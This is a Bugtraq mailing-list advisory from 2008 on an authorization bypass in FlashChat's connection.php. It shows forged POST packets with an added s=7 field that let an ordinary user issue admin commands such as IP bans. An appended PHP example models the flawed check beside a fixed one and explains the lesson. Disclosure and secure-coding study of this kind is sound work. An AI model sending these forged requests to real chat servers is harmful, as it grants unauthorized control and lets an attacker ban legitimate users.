Bugtraq mailing list archives

flashchat severe bug
From: ch0p83 () gmail com
Date: 17 Oct 2008 14:44:38 -0000

File: connection.php

if(
    ChatServer::userInRole($this->userid, ROLE_ADMIN) ||
    ChatServer::userInRole($this->userid, ROLE_MODERATOR) ||
    ($req['s'] == 7)   // <-- *bypass line*
)


This piece of code allows a normal user to bypass role filtering and to be granted the admin role as a normal user. To
exploit the vulnerability, simply send this POST data string to getxml.php while in the chat (for example, by
intercepting and modifying a legitimate message packet sent to the server with the Tamper Data plugin for Firefox):

For example, to ban a user, simply add the bypass to the normal ban request string:

replace:
// normal message sent to the server that has been intercepted
sendAndLoad=%5Btype%20Function%5D&t=hi everybody&r=0&id=

with:
// normal ban packet used by admins or mods
sendAndLoad=%5Btype%20Function%5D&t=&r=0&u=5581&b=3&c=banu&cid=1&id=

// forged packet sent by the attacker
sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=

*note the added s=7

This will IP-ban the user with id 5581 from the chat.

eLiSiA - 17-10-2008
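As an added illustration (not FlashChat's code and not part of the post above): the condition quoted from connection.php, modelled in PHP beside a hardened version, with the three packets from the post run through both. The role table, the user ids 1000 and 7, and the userInRole() stand-in for ChatServer::userInRole() are assumptions; the space in "hi everybody" is written as %20 so the body is a valid form encoding.

```php
<?php
// Added example, not FlashChat's code: models the connection.php condition
// quoted in the advisory beside a hardened version, then runs the three
// packets from the advisory through both. Role table and user ids are assumed.

const ROLE_USER      = 1;
const ROLE_MODERATOR = 2;
const ROLE_ADMIN     = 3;

// Assumed stand-in for ChatServer::userInRole(): the role is looked up
// server-side from a session-bound user id, never from the request body.
$ROLE_TABLE = [
    1000 => ROLE_USER,       // ordinary chatter (assumed id)
    7    => ROLE_ADMIN,      // assumed admin id
];

function userInRole(array $table, int $userid, int $role): bool
{
    return isset($table[$userid]) && $table[$userid] === $role;
}

// Vulnerable: the client-controlled field s is OR'd with the role lookup,
// so any user who adds s=7 to the packet passes the moderator/admin gate.
function mayModerateVulnerable(array $table, int $userid, array $req): bool
{
    return userInRole($table, $userid, ROLE_ADMIN)
        || userInRole($table, $userid, ROLE_MODERATOR)
        || (isset($req['s']) && $req['s'] == 7);   // <-- bypass line
}

// Hardened: authority derives only from the server-side role; nothing the
// client posts can widen it. Request fields only select the action.
function mayModerateFixed(array $table, int $userid, array $req): bool
{
    return userInRole($table, $userid, ROLE_ADMIN)
        || userInRole($table, $userid, ROLE_MODERATOR);
}

// Decode a POST body as getxml.php would and decide whether a ban request
// from $userid gets through. Returns [isBanRequest, vulnerableAllows, fixedAllows].
function evaluatePacket(array $table, int $userid, string $body): array
{
    parse_str($body, $req);
    $isBan = isset($req['c']) && $req['c'] === 'banu';
    return [
        $isBan,
        $isBan && mayModerateVulnerable($table, $userid, $req),
        $isBan && mayModerateFixed($table, $userid, $req),
    ];
}

// The three packets quoted in the advisory (constructed inline for this example).
$packets = [
    'normal message' => 'sendAndLoad=%5Btype%20Function%5D&t=hi%20everybody&r=0&id=',
    'admin ban'      => 'sendAndLoad=%5Btype%20Function%5D&t=&r=0&u=5581&b=3&c=banu&cid=1&id=',
    'forged ban'     => 'sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=',
];

// Every packet is sent as the ordinary user 1000, who holds no moderator rights.
foreach ($packets as $label => $body) {
    [$isBan, $vuln, $fixed] = evaluatePacket($ROLE_TABLE, 1000, $body);
    printf("%-15s ban=%-5s vulnerable allows=%-5s fixed allows=%s\n",
        $label, var_export($isBan, true), var_export($vuln, true), var_export($fixed, true));
}
```

Run with `php example.php`: only the forged packet reaches the ban branch of the vulnerable check, because `$req['s'] == 7` is true for the posted string "7"; the hardened check refuses it, since the ordinary user's role is neither admin nor moderator. The general lesson is that an authorization decision must never OR a server-side role lookup with anything taken from the request body.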

